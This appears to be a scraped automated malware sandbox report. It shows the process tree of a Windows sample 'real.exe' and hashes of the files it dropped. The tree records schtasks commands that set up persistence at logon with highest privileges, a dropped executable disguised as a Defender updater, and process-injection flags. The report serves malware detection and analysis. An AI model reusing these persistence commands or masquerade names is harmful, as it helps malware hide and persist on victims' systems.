C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1048
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:2948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3024
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\real.exe"C:\Users\Admin\AppData\Local\Temp\real.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "WindowsBIOSupd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\real.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
PID:620
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe"C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "WindowsBIOSupd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\WDefenderUpdater.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
PID:1396
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77real.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\real.exe'" /sc onlogon /rl HIGHEST2⤵
- Creates scheduled task(s)
PID:1156
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:2484
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5068
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4424
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1244
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 5472ead3cd58b550bf494b747e125c15 CGD3gLuGlUOGCdzmJ0jChg.0.1.0.0.01⤵PID:2564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2588
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD516be7896ffd96f3c15ca40ff3243674f
SHA1321e82e120535d5f48430284804d5aca5f78d8c7
SHA256e297f022413aee60290878fd253b68ecb9af7e7919ddae6093a977c10b47ca07
SHA5126dda93f0e4e47caf40bf15372fd8edee36b8a66d4d6ee3a6e1400c9297cbaa32584c6f8c97e2e76c4e3cd8b195d8e9cbb898870559e7a7177db97eb8c0a521ad
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82